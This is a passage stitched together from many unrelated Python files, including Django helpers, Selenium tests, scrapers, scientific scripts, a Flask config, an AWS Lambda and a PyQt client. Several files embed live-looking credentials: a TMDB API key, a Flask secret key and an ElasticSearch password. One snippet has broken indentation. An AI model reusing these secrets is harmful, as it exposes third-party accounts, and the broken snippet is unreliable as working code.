        producto = tblProducto.objects.get(id=producto_id)
        inversion = inversion + producto.costo * unidades_compradas
    return inversion
def calculoGananciaAcumulada(listaProductos):
    """Calculate the total sales revenue across all the given products.

    Args:
        listaProductos: Iterable of product ids to evaluate
    Returns:
        The accumulated revenue (sum of price * units sold over all products)
    """
    ganancia = 0
    # dict.fromkeys de-duplicates while preserving order: the original
    # accumulated over a dict keyed by product id, so repeated ids must
    # only be counted once.
    for producto_id in dict.fromkeys(listaProductos):
        # An empty queryset sums to 0, so no exists() pre-check is needed.
        unidades_vendidas = sum(
            venta.cantidad for venta in tblVenta.objects.filter(producto=producto_id)
        )
        producto = tblProducto.objects.get(id=producto_id)
        ganancia = ganancia + producto.precio * unidades_vendidas
    return ganancia
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from .base import FunctionalTest
class NewVisitorTest(FunctionalTest):
    """Functional (browser-driven) tests for the to-do list app's new-visitor flow.

    NOTE(review): find_element_by_tag_name is the Selenium 3 API (removed in
    Selenium 4 in favour of find_element(By.TAG_NAME, ...)) -- confirm the
    pinned selenium version. The method name below also has a typo
    ("retreive"), but renaming it would change the test id, so it is left as-is.
    """
    def test_can_start_a_list_and_retreive_it_later(self):
        # User navigates to the main page of the website.
        self.browser.get(self.live_server_url)
        # The website title suggests it's another boring todo list app.
        self.assertIn('To-Do', self.browser.title)
        header_text = self.browser.find_element_by_tag_name('h1').text
        self.assertIn('To-Do', header_text)
        # User is welcomed with a window to enter a list item.
        inputbox = self.get_item_input_box()
        self.assertEqual(
            inputbox.get_attribute('placeholder'),
            'Enter a to-do item'
        )
        # User types in "feed my cat" to a textbox.
        inputbox.send_keys('feed my cat')
        # User submits the item by hitting enter,
        # the list item is now displayed on the website.
        inputbox.send_keys(Keys.ENTER)
        self.wait_for_row_in_list_table('1: feed my cat')
    def test_multiple_users_can_start_lists_at_different_urls(self):
        # User creates his own list.
        self.browser.get(self.live_server_url)
        inputbox = self.get_item_input_box()
        inputbox.send_keys('feed my cat')
        inputbox.send_keys(Keys.ENTER)
        self.wait_for_row_in_list_table('1: feed my cat')
        # When new list is created a unique URL should be generated.
        personal_url = self.browser.current_url
        self.assertRegex(personal_url, '/lists/.+')
        # New users comes in and creates a list.
        # Quitting and restarting the browser drops the first user's session/cookies.
        self.browser.quit()
        self.browser = webdriver.Firefox()
        # User does not find the previous users list.
        self.browser.get(self.live_server_url)
        page_text = self.browser.find_element_by_tag_name('body').text
        self.assertNotIn('feed my cat', page_text)
        # Now the users creates his own list.
        inputbox = self.get_item_input_box()
        inputbox.send_keys('pet my doggo')
        inputbox.send_keys(Keys.ENTER)
        self.wait_for_row_in_list_table('1: pet my doggo')
        # He gets his own URL.
        next_personal_url = self.browser.current_url
        self.assertRegex(next_personal_url, '/lists/.+')
        self.assertNotEqual(personal_url, next_personal_url)
        # No trace of previous users list items.
        page_text = self.browser.find_element_by_tag_name('body').text
        self.assertNotIn('feed my cat', page_text)
|
# This program calculates Body Mass Index (BMI)
# author: Angelina Belotserkovskaya
# Read height in centimetres; float() (instead of int()) also accepts
# fractional input such as "172.5".
height_cm = float(input('Please enter your height in centimetres: '))
# Convert cm^2 to m^2: (h_cm)^2 / 10000 == (h_cm / 100)^2
height_m2 = (height_cm ** 2) / 10000
# Read weight in kg; float() also accepts fractional input such as "70.4".
weight = float(input('Please enter your weight in kg: '))
# BMI = weight (kg) / height (m)^2
bmi = weight / height_m2
print('Your BMI is {:.2f}'.format(bmi))
#Escribir un programa que pregunte al usuario por el número de horas trabajadas y el coste por hora. Después debe mostrar por pantalla la paga que le corresponde.
def run(salario, horas):
    """Print the total pay for the given hourly wage (salario) and hours worked (horas)."""
    print("Has ganado {} dólares".format(horas * salario))
if __name__ == "__main__":
salario = float(input("¿Cuanto ganas en dólares por hora?: "))
horas = int(input("¿Cuantas horas trabajaste?: "))
run(salario,horas) |
# Generated by Django 2.2 on 2020-09-10 10:30
import datetime
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated migration: adds the `review_date` field to the `review` model."""
    dependencies = [
        ('main', '0004_auto_20200910_1017'),
    ]
    operations = [
        migrations.AddField(
            model_name='review',
            name='review_date',
            # NOTE(review): the default is the fixed timestamp captured when the
            # migration was generated (Django's usual behaviour when a one-off
            # default is supplied for a new field) -- existing rows all receive
            # this constant value. Confirm this was intended rather than auto_now_add.
            field=models.DateTimeField(default=datetime.datetime(2020, 9, 10, 10, 30, 47, 527046), verbose_name='date published'),
        ),
    ]
|
#!/usr/bin/env python
# encoding: utf-8
"""Small demos of the collections module: namedtuple, deque, defaultdict, OrderedDict, Counter."""
from collections import namedtuple, deque, defaultdict, OrderedDict, Counter

# namedtuple: a tuple subclass whose elements are addressable by the
# custom field names x and y.  (Fixed the previous "Ponit" misspelling.)
Point = namedtuple('Point', ['x', 'y'])
p = Point(1, 2)
print(p.x)
print(p.y)
# deque: efficient appends/pops at BOTH ends.
q = deque(['x', 'y', 'z'])
q.append('a')
q.appendleft('b')
print(q)
# defaultdict: missing keys produce the factory's value instead of KeyError.
dd = defaultdict(lambda: 'N/A')
dd['key1'] = 'abc'
print(dd['key'])    # missing key -> 'N/A'
print(dd['key1'])
# OrderedDict: keys are kept in insertion order.
od = OrderedDict()
od['z'] = 1
od['y'] = 2
od['x'] = 3
print(list(od.keys()))
# Counter: counts how many times each character appears.
c = Counter()
for ch in 'programing':
    c[ch] += 1
print(c)
|
# Libraries export
from bs4 import BeautifulSoup
import requests
import pandas as pd
from twilio.rest import Client
# regex module
import re
# lbc search: saved leboncoin query (vespa-style scooters, PACA region)
url = 'https://www.leboncoin.fr/motos/offres/provence_alpes_cote_d_azur/?th=1&q=*vespa%20gt*%20OR%20PX%20OR%20LML%20NOT%20solex%20NOT%20ciao%20NOT%20gts%20NOT%20gt-s%20NOT%20200%20NOT%20neuf%20NOT%20trail%20NOT%20Kymco%20NOT%20Suzuki%20NOT%20GTV&it=1&parrot=2&ps=4'
# Request content from web page
result = requests.get(url)
c = result.content
# Set as Beautiful Soup object. FIX: name the parser explicitly - without an
# argument bs4 picks whichever parser happens to be installed (lxml,
# html5lib, ...), which can change the parse tree and emits a warning.
soup = BeautifulSoup(c, 'html.parser')
# Take all title and price tags
summary = soup.findAll('a', {'class':'list_item clearfix trackable'})
# title of the newest ad (first search result)
ad_title = summary[0].get('title')
# price of the newest ad
ad_price = soup.find_all('h3', class_='item_price')
ad_price = ad_price[0].get('content')
# list id: the first numeric token inside the anchor's markup
get_numeric = r'\d+'
listid = re.findall(get_numeric, str(summary[0]))
ad_list_id = listid[0]
# url of the ad
ad_url = summary[0].get('href')
# publication date
ad_publication_date = soup.find_all('p', class_='item_supp')
ad_publication_date = ad_publication_date[2].get('content')
# get the last seen ad_list_id from the csv history
previous_ad_list_id = pd.read_csv('df_vespa.csv', sep=';')
previous_ad_list_id = previous_ad_list_id.ad_list_id.iloc[-1]
previous_ad_list_id = str(previous_ad_list_id)
# Check if there is a new ad
if previous_ad_list_id != ad_list_id:
    # send an SMS about the new ad
    # NOTE(review): these are placeholder credentials; load the real account
    # SID/token and phone numbers from the environment, never from source.
    account = "*****************"
    token = "**********"
    client = Client(account, token)
    message = client.messages.create(to="+**********",
                                    from_="+**********",
                                    body="""
            Hello Dad! Nouvelle annonce à consulter : """
                                    + ad_title
                                    + ' - '
                                    + ad_price
                                    + ' - '
                                    + ad_url
                                    + ' - Fonce !' )
    # add the new ad to the df_vespa.csv
    new_vespa_ad = {'ad_title' : ad_title, 'ad_list_id' : ad_list_id, 'ad_url' : ad_url}
    new_vespa_ad = pd.DataFrame(index=[ad_publication_date], data=new_vespa_ad)
    # append date and retention value to the csv
    new_vespa_ad.to_csv('df_vespa.csv', mode='a', header=False, encoding='UTF-8', sep=';')
    # print log
    print('New available ad:')
    print(ad_title)
    print('---')
    print(ad_price)
    print('---')
    print(ad_publication_date)
    print('---')
    print(ad_list_id)
    print('---')
    print(ad_url)
else:
    print('No new Ad')
|
from morepath import redirect
from onegov.core.security import Secret
from onegov.translator_directory import _
from onegov.translator_directory import TranslatorDirectoryApp
from onegov.translator_directory.forms.mutation import ApplyMutationForm
from onegov.translator_directory.layout import ApplyTranslatorChangesLayout
from onegov.translator_directory.models.message import \
TranslatorMutationMessage
from onegov.translator_directory.models.mutation import TranslatorMutation
@TranslatorDirectoryApp.form(
    model=TranslatorMutation,
    name='apply',
    template='form.pt',
    permission=Secret,
    form=ApplyMutationForm
)
def apply_translator_mutation(self, request, form):
    """ Apply the changes proposed by a translator mutation.

    On a valid submit the mutation is written to the translator record, a
    ticket message is created and the user is redirected; on GET the form is
    pre-filled from the mutation and the page is rendered.
    """
    if form.submitted(request):
        form.update_model()
        request.success(_("Proposed changes applied"))
        TranslatorMutationMessage.create(
            self.ticket,
            request,
            'applied',
            form.changes.data
        )
        # stay on the current page when the view was opened with ?return-to
        if 'return-to' in request.GET:
            return request.redirect(request.url)
        return redirect(request.link(self))
    else:
        # GET request: populate the form with the proposed values for review
        form.apply_model()
    layout = ApplyTranslatorChangesLayout(self.target, request)
    return {
        'layout': layout,
        'title': _("Apply proposed changes"),
        'form': form
    }
|
# -*- coding: cp1252 -*-
# Python 2 script: reads "Title,Year" rows from Book1.csv, looks each title up
# on themoviedb.org and writes countries/languages columns to Book1-filled.csv.
import codecs
import simplejson
import requests
#rotten_tomatoes_key = 'mq7dazg2njhpky3u5g5qqy6x'
# http://developer.rottentomatoes.com/docs
# http://www.omdbapi.com/?i=&t=Nina%27s+Heavenly+Delights
# http://www.imdb.com/xml/find?json=1&nr=1&q=Nina's+Heavenly+Delights
# NOTE(review): API key committed to source - rotate it and read it from the
# environment instead.
themoviedb_key = '8df14339012799a50c81f9119908160b'
# http://api.themoviedb.org/3/search/movie?api_key=8df14339012799a50c81f9119908160b&query=Nina's+Heavenly+Delights
# http://api.themoviedb.org/3/movie/12808?api_key=8df14339012799a50c81f9119908160b
search_url = "http://api.themoviedb.org/3/search/movie?api_key={0}&query={1}"
get_url = "http://api.themoviedb.org/3/movie/{0}?api_key={1}"
f = codecs.open('Book1.csv', encoding='cp1252')
out = codecs.open('Book1-filled.csv', encoding='utf-8', mode='w+')
# consume the input header row
line = f.readline();
cols = line.split(',')
print '\n----\n'
out.write('Input Title,Input Year,Country 1,Country 2,Country 3,Country 4,Language 1,Language 2,Language 3,Language 4,Lang 1,Lang 2,Lang 3,Lang 4,Output Title (for verification),Output Release Date (for verification)\n');
# NOTE(review): the cache stores countries/languages but NOT original_title or
# release_date, so a cache hit reuses those two from the previous iteration.
cache = dict()
limit = 10000000
line_id = 0
for line in f:
    line_id = line_id + 1
    if line_id > limit:
        break
    # last comma-separated field is the year; everything before it is the title
    vals = line.split(',')
    year = vals[-1].strip('\n\r')
    title = ','.join(vals[:-1])
    title = title.strip('"')
    if line in cache:
        movie_countries = cache[line]['movie_countries']
        movie_languages = cache[line]['movie_languages']
        movie_langs = cache[line]['movie_langs']
        print 'CACHE!'
    else:
        movie_countries = ['', '', '', '']
        movie_languages = ['', '', '', '']
        movie_langs = ['', '', '', '']
        qtitle = title.replace(' ', '+').encode('utf-8')
        query = search_url.format(themoviedb_key, qtitle)
        resp = requests.get(url=query)
        if resp and resp.content:
            data = simplejson.loads(resp.content)
            results = data['results']
            if len(results) == 0:
                # NOTE(review): when the very first row has no match,
                # original_title/release_date below are unbound -> NameError.
                print 'NO MOVIE FOUND :((('
            else:
                # fetch the full movie record for the top search hit
                result = results[0]
                movie_id = result['id']
                query = get_url.format(movie_id, themoviedb_key)
                resp = requests.get(url=query)
                data = simplejson.loads(resp.content)
                original_title = data['original_title']
                release_date = data['release_date']
                countries = data['production_countries']
                if len(countries) > 0:
                    movie_country = ""
                    idx = 0
                    # keep at most the first four production countries
                    for country in countries:
                        movie_countries[idx] = country['name']
                        idx = idx + 1
                        if idx >= 4:
                            break
                languages = data['spoken_languages']
                if len(languages) > 0:
                    movie_language = ""
                    idx = 0
                    # keep at most the first four spoken languages (name + ISO code)
                    for language in languages:
                        movie_languages[idx] = language['name']
                        movie_langs[idx] = language['iso_639_1']
                        idx = idx + 1
                        if idx >= 4:
                            break
        cache[line] = {
            'movie_countries': movie_countries,
            'movie_languages': movie_languages,
            'movie_langs': movie_langs
        }
    output_line = '"' + title + '",' + year + ',' + ','.join(movie_countries) + ',' + ','.join(movie_languages) + ',' + ','.join(movie_langs) + ',"' + original_title + '",' + release_date + ''
    print output_line
    out.write(output_line + '\n')
|
#queue
class Queue:
    """Simple FIFO queue.

    Backed by collections.deque so that both enqueue (push) and dequeue (pop)
    are O(1); the original list-based version paid O(n) per ``pop(0)``.
    """
    def __init__(self):
        from collections import deque  # local import keeps the class self-contained
        self.stack = deque()
    def push(self, a):
        """Append an item at the back of the queue."""
        self.stack.append(a)
    def pop(self):
        """Remove and return the front item (IndexError when empty, as before)."""
        return self.stack.popleft()
    def is_empty(self):
        """Return True when the queue holds no items."""
        return not self.stack
if __name__ == '__main__':
    # Round-robin scheduling simulation: each task runs for at most one
    # quantum per turn; print a task's name and finish time when it completes.
    quantum = 100
    tasks = [("p1", 150), ("p2", 80), ("p3", 200), ("p4", 350), ("p5", 20)]
    queue = Queue()
    for entry in tasks:
        queue.push(entry)
    elapsed_time = 0
    while not queue.is_empty():
        name, remaining = queue.pop()
        if remaining > quantum:
            # not finished: consume a full quantum and requeue the remainder
            elapsed_time += quantum
            queue.push((name, remaining - quantum))
        else:
            elapsed_time += remaining
            print("{} {}".format(name, elapsed_time))
|
#!/usr/bin/python
# Caesar decoder: the text is encoded with a forward shift of 2
# (k -> m, o -> q, e -> g, y -> a, z -> b), i.e. shift by 2 mod 26.
stringdata = "g fmnc wms bgblr rpylqjyrc gr zw fylb. rfyrq ufyr amknsrcpq ypc dmp. bmgle gr gl zw fylb gq glcddgagclr ylb rfyr'q ufw rfgq rcvr gq qm jmle. sqgle qrpgle.kyicrpylq() gq pcamkkclbcb. lmu ynnjw ml rfc spj."
chars = []
for ch in stringdata:
    if ch.isalpha():
        # Proper mod-26 shift within 'a'..'z'. The original wrote
        # "(ord(ch)+2%26)": precedence applies %26 to the constant 2 only,
        # so it never wrapped and had to special-case 'y' and 'z' by hand.
        chars.append(chr((ord(ch) - ord('a') + 2) % 26 + ord('a')))
    else:
        chars.append(ch)
# print with parentheses works identically under Python 2 and 3 here
print("".join(chars))
|
from collections import namedtuple
from onegov.core.crypto import random_token
from onegov.core.orm import Base
from onegov.core.orm.mixins import TimestampMixin
from onegov.core.orm.types import UTCDateTime
from onegov.file import AssociatedFiles
from onegov.file import File
from onegov.file.utils import as_fileintent
from sedate import as_datetime
from sedate import standardize_date
from sqlalchemy import Column
from sqlalchemy import Date
from sqlalchemy import extract
from sqlalchemy import Integer
from sqlalchemy import Text
from sqlalchemy_utils import observes
from sqlalchemy.orm import object_session
class IssueName(namedtuple('IssueName', ['year', 'number'])):
    """ A gazette issue identifier composed of a year and a running number.

    Serialized as 'year-number' (via repr) for use in forms and database
    columns, and parsed back with :meth:`from_string`.

    """
    def __repr__(self):
        return '{}-{}'.format(self.year, self.number)
    @classmethod
    def from_string(cls, value):
        # convert each dash-separated part; a wrong number of parts surfaces
        # as a TypeError from the tuple constructor, exactly as before
        return cls(*map(int, value.split('-')))
class IssuePdfFile(File):
    """ The rendered PDF file attached to a gazette issue. """
    __mapper_args__ = {'polymorphic_identity': 'gazette_issue'}
class Issue(Base, TimestampMixin, AssociatedFiles):
    """ Defines an issue. """
    __tablename__ = 'gazette_issues'
    #: the id of the db record (only relevant internally)
    id = Column(Integer, primary_key=True)
    #: The name of the issue.
    name = Column(Text, nullable=False)
    #: The number of the issue.
    number = Column(Integer, nullable=True)
    # The issue date.
    date = Column(Date, nullable=True)
    # The deadline of this issue.
    deadline = Column(UTCDateTime, nullable=True)
    @property
    def pdf(self):
        # the PDF is the single associated file, when one has been generated
        return self.files[0] if self.files else None
    @pdf.setter
    def pdf(self, value):
        # create-or-replace: reuse the existing file record if there is one
        filename = '{}.pdf'.format(self.name)
        pdf = self.pdf or IssuePdfFile(id=random_token())
        pdf.name = filename
        pdf.reference = as_fileintent(value, filename)
        if not self.pdf:
            self.files.append(pdf)
    def notices(self, state=None):
        """ Returns a query to get all notices related to this issue. """
        from onegov.gazette.models.notice import GazetteNotice # circular
        notices = object_session(self).query(GazetteNotice)
        notices = notices.filter(
            GazetteNotice._issues.has_key(self.name) # noqa
        )
        if state:
            notices = notices.filter(GazetteNotice.state == state)
        return notices
    @property
    def first_publication_number(self):
        """ Returns the first publication number of this issue based on the
        last issue of the same year. """
        from onegov.gazette.models.notice import GazetteNotice # circular
        session = object_session(self)
        # all earlier issues of the same year
        issues = session.query(Issue.name)
        issues = issues.filter(extract('year', Issue.date) == self.date.year)
        issues = issues.filter(Issue.date < self.date)
        issues = [issue[0] for issue in issues]
        if not issues:
            return 1
        # continue counting from the highest number used so far this year
        numbers = []
        for issue in issues:
            query = session.query(GazetteNotice._issues[issue])
            query = query.filter(GazetteNotice._issues.has_key(issue)) # noqa
            numbers.extend([int(x[0]) for x in query if x[0]])
        return max(numbers) + 1 if numbers else 1
    def publication_numbers(self, state=None):
        """ Returns a dictionary containing all publication numbers (by notice)
        of this issue.
        """
        from onegov.gazette.models.notice import GazetteNotice # circular
        query = self.notices(state).with_entities(
            GazetteNotice.id,
            GazetteNotice._issues[self.name]
        )
        return dict(query)
    @property
    def in_use(self):
        """ True, if the issue is used by any notice. """
        if self.notices().first():
            return True
        return False
    @observes('date')
    def date_observer(self, date_):
        """ Changes the issue date of the notices when updating the date
        of the issue.
        At this moment, the transaction is not yet commited: Querying the
        current issue returns the old date.
        """
        # map issue name -> (UTC) date, substituting this issue's new date
        issues = object_session(self).query(Issue.name, Issue.date)
        issues = dict(issues.order_by(Issue.date))
        issues[self.name] = date_
        issues = {
            key: standardize_date(as_datetime(value), 'UTC')
            for key, value in issues.items()
        }
        # each notice's first_issue becomes the earliest of its issues' dates
        for notice in self.notices():
            dates = [issues.get(issue, None) for issue in notice._issues]
            dates = [date for date in dates if date]
            notice.first_issue = min(dates)
    def publish(self, request):
        """ Publishes the issue.
        This ensures that every accepted notice of this issue is published. It
        then creates the PDF while assigning the publications numbers (it uses
        the highest publication number of the last issue of the same year as a
        starting point.
        """
        for notice in self.notices('accepted'):
            notice.publish(request)
        from onegov.gazette.pdf import IssuePdf # circular
        self.pdf = IssuePdf.from_issue(
            issue=self,
            request=request,
            first_publication_number=self.first_publication_number,
            links=request.app.principal.links
        )
|
INF = 1e9
if __name__ == "__main__":
    # All-pairs shortest paths (Floyd-Warshall) with negative-cycle detection.
    # Input: repeated test cases "n m q", m edges "u v d", q queries "u v";
    # terminated by "0 0 0".
    while True:
        n, m, q = map(int, input().split())
        if n == 0 and m == 0 and q == 0:
            break
        # distance matrix: zero on the diagonal, "unreachable" elsewhere
        dist = [[0 if i == j else INF for j in range(n)] for i in range(n)]
        for _ in range(m):
            u, v, d = map(int, input().split())
            if d < dist[u][v]:
                dist[u][v] = d
        # classic triple-loop relaxation
        for via in range(n):
            for src in range(n):
                for dst in range(n):
                    if dist[src][via] < INF and dist[via][dst] < INF:
                        candidate = dist[src][via] + dist[via][dst]
                        if candidate < dist[src][dst]:
                            dist[src][dst] = candidate
        # any pair routable through a negative cycle has unbounded cost
        for via in range(n):
            if dist[via][via] < 0:
                for src in range(n):
                    for dst in range(n):
                        if dist[src][via] != INF and dist[via][dst] != INF:
                            dist[src][dst] = -INF
        for _ in range(q):
            u, v = map(int, input().split())
            if dist[u][v] == INF:
                print("Impossible")
            elif dist[u][v] == -INF:
                print("-Infinity")
            else:
                print(dist[u][v])
        print()
|
#!/usr/bin/env python3
import vcf
import pysam
import primer3
import argparse
import sys
def get_ref_dict(reffilename):
    """Map every reference/contig name in a FASTA file to its full sequence."""
    fasta = pysam.FastaFile(reffilename)
    return {name: fasta.fetch(region=name) for name in fasta.references}
def make_primers_in_vcf(vcfreader, referencedict, exclusions):
    """Design one primer pair per VCF record and print them as TSV to stdout.

    Sites without a usable pair are reported on stderr and skipped.
    """
    columns = ['chr', 'pos', 'left', 'right', 'leftpos', 'rightpos']
    print('\t'.join(columns))
    for record in vcfreader:
        summary = short_result(make_primer_for_record(record, referencedict, exclusions))
        if summary['left'] and summary['right']:
            print('\t'.join(array_result(summary)))
        else:
            print("Could not create a primer pair for coordinate", summary['chr'], summary['pos'], file = sys.stderr)
def make_primer_for_record(record, referencedict, exclusions):
    """Design sequencing primers around a single VCF site with primer3.

    Args:
        record: VCF record supplying CHROM and POS.
        referencedict: mapping of reference name -> full sequence string.
        exclusions: optional mapping of chromosome -> list of [pos, length]
            regions the primers must not overlap; the target site itself is
            removed from the excluded list.

    Returns:
        The primer3 result dict augmented with 'chr' and 'pos' keys.
    """
    chrom = record.CHROM
    pos = record.POS
    seqid = str(chrom) + ":" + str(pos)
    seq_args = {
        'SEQUENCE_ID' : seqid,
        'SEQUENCE_TEMPLATE' : referencedict[chrom],
        'SEQUENCE_TARGET' : [pos, 1]
    }
    if exclusions is not None:
        ex = exclusions[chrom]
        # BUG FIX: the original filtered with "e is not [pos, 1]", an identity
        # comparison against a brand-new list that is always True - the target
        # site was therefore never removed. Equality is what was intended.
        seq_args['SEQUENCE_EXCLUDED_REGION'] = [e for e in ex if e != [pos, 1]]
    global_args = {
        'PRIMER_TASK' : 'pick_sequencing_primers',
        'PRIMER_FIRST_BASE_INDEX' : 1
    }
    result = primer3.bindings.designPrimers(seq_args = seq_args, global_args = global_args)
    result['chr'] = chrom
    result['pos'] = pos
    return result
def short_result(p3dict):
    """Reduce a raw primer3 result dict to the six fields we report."""
    left_location = p3dict.get('PRIMER_LEFT_0', [''])
    right_location = p3dict.get('PRIMER_RIGHT_0', [''])
    return {
        'chr' : p3dict.get('chr'),
        'pos' : p3dict.get('pos'),
        'left' : p3dict.get('PRIMER_LEFT_0_SEQUENCE', ''),
        'right' : p3dict.get('PRIMER_RIGHT_0_SEQUENCE', ''),
        'leftpos' : left_location[0],
        'rightpos' : right_location[0]
    }
def array_result(res):
    """Serialize the six summary fields to strings, in fixed column order."""
    columns = ('chr', 'pos', 'left', 'right', 'leftpos', 'rightpos')
    return [str(res[column]) for column in columns]
def parse_args():
    """Parse command-line options (reads sys.argv).

    -v/--vcf defaults to stdin; -r/--reference may be omitted, in which case
    the caller falls back to the VCF header; -e/--exclude is optional.
    """
    parser = argparse.ArgumentParser(description =
    """Create primers using primer3 from a given reference
    to sequence sites in a given vcf.
    """
    )
    parser.add_argument("-v", "--vcf", help = "VCF containing sites to amplify", default = sys.stdin)
    parser.add_argument("-r", "--reference", help = "Reference to create primers from")
    parser.add_argument("-e", "--exclude", help = """A vcf containing potentially variable sites to
    exclude from overlapping the primers.""")
    args = parser.parse_args()
    return args
def load_files(vcffile, reffile):
    """Open the VCF and load the reference sequences.

    When no reference path is given, fall back to the ``reference`` entry in
    the VCF header (stripping a leading ``file://`` scheme).
    """
    reader = vcf.Reader(filename = vcffile)
    if reffile is None:
        print("Reference not given. Attempting to find one in the VCF header.", file = sys.stderr)
        reffile = reader.metadata['reference']
        if reffile.startswith('file://'):
            reffile = reffile.replace('file://','',1)
        print("Using", reffile, "as reference.", file = sys.stderr )
    reference_map = get_ref_dict(reffile)
    return reader, reference_map
def load_exclusions(exclusionfile):
    """Collect [POS, 1] regions per chromosome from a VCF of variable sites."""
    exclusion_map = dict()
    for record in vcf.Reader(filename = exclusionfile):
        exclusion_map.setdefault(record.CHROM, list()).append([record.POS, 1])
    return exclusion_map
def main():
    """Entry point: parse arguments, load inputs and emit primers."""
    args = parse_args()
    vcfreader, refdict = load_files(args.vcf, args.reference)
    exclusions = load_exclusions(args.exclude) if args.exclude is not None else None
    make_primers_in_vcf(vcfreader, refdict, exclusions)
|
# Flask application configuration module.
import os
basedir = os.path.abspath(os.path.dirname(__file__))
DEBUG=False
CSRF_ENABLED = True
# NOTE(review): the secret key is committed to source control - rotate it and
# load it from the environment (e.g. os.environ['SECRET_KEY']) instead.
SECRET_KEY = 'gO57w=09]SBP:x(<\lP~t>5mD@F;@]8|ZhE<k+B\T|0jD8azhXc.X[GwE}h0x7+0k:G)E^-0drgMw`fi/_Zle^Jp;*~<t?OV0kICBs-}u\<R,\TI<DCdXJg(DGnt,TwDl@*Ebc{~XO>h,XSq]HX}rL<va"r2Z=2edZl[X_P8v=^PKpbG-g2a1yponhRk]n:c7:)kEZF[K{=fZ&a.-=*dA&;C5,mS}<e!O>|[^zhOzwl#W'
# SQLite database next to this file, plus the migration repository
SQLALCHEMY_DATABASE_URI = 'sqlite:///' + os.path.join(basedir, 'app.db')
SQLALCHEMY_MIGRATE_REPO = os.path.join(basedir, 'db_repository')
#Weblab
LOGIN_URL = "https://weblab.deusto.es/weblab/client/#page=experiment&exp.category=Aquatic%20experiments&exp.name=aquariumg"
|
import json
import boto3
import datetime
import requests
import time
# Change before demo #
# Deployment-specific endpoints: the ElasticSearch photo index and the S3
# bucket serving the photo objects.
es_url = 'https://search-photos-bnrbmus63teifn3tn5obq24pjq.us-east-1.es.amazonaws.com'
s3_url = 'https://hw2-s3-bucket.s3.amazonaws.com/'
def lambda_handler(event, context):
    """Photo-search Lambda: run the API Gateway query string through Lex to
    extract search labels, look each label up in ElasticSearch and return the
    matching S3 object URLs as a JSON list."""
    lex = boto3.client('lex-runtime')
    response = lex.post_text(
        botName = 'HWTwoLex',
        botAlias = 'dev',
        userId = "AUser",
        inputText = event['queryStringParameters']['q']
    )
    results = []
    if response["intentName"] != 'SearchIntent':
        print("- Could not extract with Lex.")
    else:
        # each filled Lex slot is a label to query against the photo index
        for label in response['slots'].values():
            if label:
                print ('- Retrieving ES results for', label)
                # NOTE(review): basic-auth credentials are hard-coded - move
                # them to environment variables / Secrets Manager.
                res = requests.get(es_url + '/photos/_doc/_search?q=' + label ,
                    auth = ('esmaster','Esmasterpass123!'),
                    headers = {"Content-Type": "application/json"})
                for hit in res.json()['hits']['hits']:
                    results += [s3_url + hit['_source']['objectKey']]
    print(results)
    return {
        'statusCode': 200,
        'headers': {
            "Access-Control-Allow-Origin": "*",
            'Content-Type': 'application/json'
        },
        'body': json.dumps(results)
    }
|
#!/usr/bin/python3
'''
convert srt to ass with a suitable format
'''
import argparse
from threading import Thread
import pysubs2
# Styling applied to every converted subtitle file
BORDER = 'ScaledBorderAndShadow'  # ASS script-info key (turned off in main)
FONT = 'DejaVu Sans'
FONT_SIZE = 20
MARGINV = 2  # vertical margin for the Default style
EN_STYLE = r'{\fs14}'  # override tag: smaller font for the second (English) line
def main(srt_in):
    """Convert one .srt file to .ass alongside it.

    Applies the module-level style constants and shrinks the text after the
    first line break (the English half of a bilingual subtitle).
    """
    subs = pysubs2.load(srt_in, encoding='UTF-8')
    subs.info[BORDER] = 'no'
    default_style = subs.styles['Default']
    default_style.fontname = FONT
    default_style.fontsize = FONT_SIZE
    default_style.marginv = MARGINV
    for event in subs:
        split_at = event.text.find(r'\N')
        if split_at == -1:
            continue
        # keep the line break, then switch to the smaller font for line two
        event.text = event.text[:split_at] + r'\N' + EN_STYLE + event.text[split_at + 2:]
    subs.save(srt_in[:-4] + '.ass', encoding='UTF-8')
if __name__ == '__main__':
    PARSER = argparse.ArgumentParser(
        description='convert srt format to ass with a suitable style.'
    )
    PARSER.add_argument(
        'srt_input',
        nargs='+',
        help='input subtitles file(s)',
    )
    ARGS = PARSER.parse_args()
    # convert the given files concurrently, one worker thread per file
    for srt_file in ARGS.srt_input:
        Thread(target=main, args=[srt_file]).start()
|
from gui.model_view_components.remote_filesystem_model import FileItem
__author__ = 'Галлям'
from PyQt5 import QtWidgets, QtGui, QtCore
from core.core import Core
import gui.model_view_components.local_filesystem_view as local
import gui.model_view_components.remote_filesystem_view as remote
class MainWindow(QtWidgets.QMainWindow):
    """Main FTP-client window: a connection toolbar, a log browser and the
    local/remote filesystem explorers, all wired to the application Core."""
    text_read = QtCore.pyqtSignal()
    def __init__(self, parent: QtWidgets.QWidget=None):
        super().__init__(parent)
        # registries keyed by role name, populated by the create_* helpers
        self.actions = {}
        self.menus = {}
        self.edit_lines = {}
        self.buttons = {}
        self.layouts = {}
        self.widgets = {}
        self.core = Core()
        self.create_edit_lines()
        self.create_buttons()
        self.create_actions()
        self.create_menus()
        self.create_layouts()
        self.create_widgets()
        self.create_toolbars()
        self.setCentralWidget(self.widgets['central_widget'])
        self.connect_widgets_and_layouts()
        self.statusBar()
        self.connect_signals_to_slots()
    def connect_widgets_and_layouts(self):
        """Nest the created layouts and widgets into the window structure."""
        self.widgets['central_widget'].setLayout(self.layouts['main_layout'])
        self.widgets['conn_widget']. \
            setLayout(self.layouts['conn_toolbar_layout'])
        self.layouts['dir_models_layout']. \
            addWidget(self.widgets['local_filesystem'])
        self.layouts['dir_models_layout']. \
            addWidget(self.widgets['remote_filesystem'])
        self.layouts['main_layout']. \
            insertWidget(0, self.widgets['log_browser'])
        self.layouts['main_layout'].addLayout(self.layouts['dir_models_layout'])
    def contextMenuEvent(self, event):
        """Right-click menu offering the exit action."""
        menu = QtWidgets.QMenu(self)
        menu.addAction(self.actions['exit_action'])
        menu.exec(event.globalPos())
    def create_menus(self):
        """Build the File menu (with a More submenu holding Exit)."""
        file_menu = self.menuBar().addMenu("&File")
        # file_menu.addAction(self.actions['new_action'])
        self.menus['file_menu'] = file_menu
        more_menu = file_menu.addMenu("&More")
        more_menu.addAction(self.actions['exit_action'])
        self.menus['more_menu'] = more_menu
    def create_actions(self):
        exit_action = QtWidgets.QAction("&Exit", self)
        exit_action.setShortcuts(QtGui.QKeySequence.Quit)
        exit_action.triggered.connect(self.close)
        self.actions['exit_action'] = exit_action
    def create_edit_lines(self):
        """Create the host/password/username/port line edits."""
        host_edit = QtWidgets.QLineEdit()
